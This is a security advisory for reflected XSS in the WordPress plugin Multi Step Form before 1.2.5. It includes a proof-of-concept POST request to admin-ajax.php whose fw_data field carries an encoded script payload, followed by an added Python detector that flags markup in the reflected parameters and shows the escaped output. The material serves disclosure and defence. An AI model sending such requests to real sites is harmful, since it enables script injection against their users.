WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks. This issue can be exploited by unauthenticated attackers, for example via CSRF.
The following parameters of the fw_send_data function are vulnerable:
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email
Proof of Concept (PoC):
The following POST request causes the browser to display an alert when the response is rendered:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close
action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0
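As an added detection example (not part of this advisory or the plugin's code), the following Python decodes the PoC body above, flags the fw_data[...]/email parameters that carry HTML markup, and shows what those values become once HTML-escaped, which is the output encoding the vulnerable handler lacks. The path and action checks assume the admin-ajax.php endpoint and the fw_send_email action shown in the PoC.

```python
# Added example (not from the advisory): flag admin-ajax requests to the
# fw_send_email action whose fw_data/email parameters carry HTML markup,
# and show what the values look like once properly HTML-escaped.
import html
import re
from urllib.parse import parse_qs

# Markup a handler must never reflect verbatim into an HTML response.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)

def decode_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: [values]}."""
    return parse_qs(body, keep_blank_values=True)

def find_markup_params(body: str) -> list:
    """Return (parameter, decoded value) pairs whose value contains markup."""
    hits = []
    for name, values in decode_form_body(body).items():
        # Only the parameters the advisory names are reflected: fw_data[...] and email.
        if not (name.startswith("fw_data[") or name == "email"):
            continue
        for value in values:
            if MARKUP_RE.search(value):
                hits.append((name, value))
    return hits

def is_suspicious_request(path: str, body: str) -> bool:
    """True for a POST to admin-ajax.php with action=fw_send_email carrying markup."""
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return False
    if decode_form_body(body).get("action") != ["fw_send_email"]:
        return False
    return bool(find_markup_params(body))

def escaped_values(body: str) -> list:
    """What the flagged values become once HTML-escaped on output (the mitigation)."""
    return [html.escape(v, quote=True) for _, v in find_markup_params(body)]

# Constructed sample: the request body from the advisory's PoC.
POC_BODY = ("action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
            "&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com"
            "&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0")

if __name__ == "__main__":
    for name, value in find_markup_params(POC_BODY):
        print(f"{name} = {value!r}  ->  escaped: {html.escape(value, quote=True)}")
    print("suspicious:", is_suspicious_request("/wordpress/wp-admin/admin-ajax.php", POC_BODY))
```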